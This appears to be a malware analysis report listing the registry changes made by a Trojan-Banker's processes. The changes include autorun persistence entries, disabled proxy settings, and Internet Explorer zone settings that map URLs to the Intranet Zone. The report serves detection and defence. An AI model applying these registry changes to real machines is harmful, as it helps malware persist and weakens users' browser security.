The Trojan-Banker deletes the following value(s) in system registry:
The Trojan-Banker disables automatic startup of the application by deleting the following autorun value:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"YyfmPlay"
"BoxNews"
"YYMusic3_News"
"YYMusic3"

The process axult.exe:1744 makes changes in the system registry.
The Trojan-Banker creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 20 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "52 B1 FA 66 C7 27 79 BA 4A 1A B3 05 76 82 B1 EF"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan-Banker modifies IE security-zone settings so that all local web nodes whose names contain no dots and that are not assigned to any zone are mapped to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan-Banker modifies IE security zone settings to map all web-nodes that bypass the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan-Banker modifies IE security zone settings to map all URLs to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan-Banker deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process MBManager.exe:2480 makes changes in the system registry.
The Trojan-Banker creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1E E0 9B 97 DC 52 DD A7 8D 9B 24 9C 35 9B 3A F6"

The process %original file name%.exe:132 makes changes in the system registry.
The Trojan-Banker creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5E D3 41 05 FE 16 81 DF 7D 7A DF CC 1A 64 0B D4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\WinRAR SFX]
"C%%Program Files%vsgrtaho" = "%Program Files%\vsgrtaho"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\vsgrtaho]
"vsgrtaho.exe" = "vsgrtaho"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan-Banker modifies IE security zone settings to map all URLs to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan-Banker modifies IE security zone settings to map all local web-node names that contain no dots and are not assigned to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan-Banker modifies IE security zone settings to map all web-nodes that bypass the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The process vsgrtaho.exe:1684 makes changes in the system registry.
The Trojan-Banker creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\vsgrtaho]
"setup_2948-140896.exe" = "MusicFM安装程序"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\vsgrtaho]
"setup_open_341.exe" = "无极影音安装程序"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "47 4B AE 51 CB CE 89 47 E2 3D 99 F6 AD 48 E3 5B"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\vsgrtaho]
"axult.exe" = "axult"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\vsgrtaho]
"axuls.exe" = "axuls"

The Trojan-Banker modifies IE security zone settings to map all local web-node names that contain no dots and are not assigned to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan-Banker modifies IE security zone settings to map all web-nodes that bypass the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan-Banker modifies IE security zone settings to map all URLs to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan-Banker deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process YYSpeed2.exe:2084 makes changes in the system registry.
The Trojan-Banker creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9D D6 AB A3 35 43 F6 1B A2 3E 7E 7D 14 7C F0 B6"

The process setup_qd304.exe:2396 makes changes in the system registry.
The Trojan-Banker creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "89 FC BC 25 B9 90 4E 0F A2 22 AE D6 0D 70 38 E6"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\gssoft\gswb]
"InstallPath" = "%Program Files%\gssoft\gswb\"
"InstallType" = "0"
"OldInstallPath" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process setup_qd304.exe:1972 makes changes in the system registry.
The Trojan-Banker creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5F 4A B1 37 B3 34 F4 E2 93 F6 C0 56 AC 62 EB AD"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process Mutual.exe:2224 makes changes in the system registry.
The Trojan-Banker creates and/or sets the following values in system registry:

[HKCR\GSWBSkinFile\DefaultIcon]
"(Default)" = "%Program Files%\gssoft\gswb\2.8.1.1120\SkinReg.exe"

[HKLM\SOFTWARE\gssoft\gswb]
"InstallPath" = "%Program Files%\gssoft\gswb\"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\光速输入法]
"DisplayVersion" = "2.8.1.1120"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\%Program Files%\gssoft\gswb\说明.txt,"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\光速输入法]
"DisplayName" = "光速输入法 2.8"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\光速输入法]
"URLInfoAbout" = "http://www.guangsu.cn/"

[HKCR\GSWBSkinFile\shell\open\command]
"(Default)" = "%Program Files%\gssoft\gswb\2.8.1.1120\SkinReg.exe -install %1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\光速输入法]
"DisplayIcon" = "%Program Files%\gssoft\gswb\2.8.1.1120\Config.exe"

[HKCR\GSWBSkinFile]
"(Default)" = "GSWBSkinFile"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\光速输入法]
"Publisher" = "光速输入法"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D7 4E CB 65 5E FD A1 24 0B 40 10 08 1B 39 57 10"

[HKCR\.gss]
"(Default)" = "GSWBSkinFile"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\光速输入法]
"UninstallString" = "%Program Files%\gssoft\gswb\2.8.1.1120\Uninst.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

To run itself automatically each time Windows boots, the Trojan-Banker adds a link to its file under the following system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"GSMutualRunOne" = "%Program Files%\gssoft\gswb\2.8.1.1120\Mutual.exe RestartRunOneProgram"

The process YYMusic2.exe:3844 makes changes in the system registry.
The Trojan-Banker creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 23 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D8 DD F0 47 6E 19 18 7A BD 42 06 D2 5E 36 5C 79"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan-Banker modifies IE security zone settings to map all local web-node names that contain no dots and are not assigned to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

To run itself automatically each time Windows boots, the Trojan-Banker adds links to its files under the following system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"YYMusic3_2014050713" = "%Program Files%\YYMusic3\2014050713\YYMusic2.exe -mini"
"YYMusic3_News_2014050713" = "%Program Files%\YYMusic3\2014050713\YYSpeed2.exe -mini"

The Trojan-Banker modifies IE security zone settings to map all web-nodes that bypass the proxy to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan-Banker modifies IE security zone settings to map all URLs to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan-Banker deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process setup_open_341.:2660 makes changes in the system registry.
The Trojan-Banker creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\无极影音]
"DisplayIcon" = "%Program Files%\wjplay2\20140507132818\Unins.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\无极影音]
"DisplayName" = "wjplay2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKLM\SOFTWARE\wjplay2]
"RD" = "_20140507132818"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\无极影音]
"DisplayVersion" = "1.0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\无极影音]
"UninstallString" = "%Program Files%\wjplay2\20140507132818\Unins.exe"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B3 D7 A2 A4 74 5D 93 3E 10 5B A9 C8 A4 2C 61 BA"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\无极影音]
"Publisher" = "wjplay2"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

To run itself automatically each time Windows boots, the Trojan-Banker adds links to its files under the following system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"wjplay2_News_20140507132818" = "%Program Files%\wjplay2\20140507132818\WJSpeed.exe -mini"
"wjplay2_20140507132818" = "%Program Files%\wjplay2\20140507132818\wjplay.exe -mini"

The Trojan-Banker deletes the following value(s) in system registry:
The Trojan-Banker disables automatic startup of the application by deleting the following autorun value(s):

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"WJNews"
"wjplay2"
"WujiPlayer"
"wjplay2_News"

The process axuls.exe:884 makes changes in the system registry.
The Trojan-Banker creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1F 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9F 24 1F 37 D7 A4 04 BD F4 CB 7B 75 06 B1 11 BA"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan-Banker modifies IE security zone settings to map all local web-node names that contain no dots and are not assigned to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

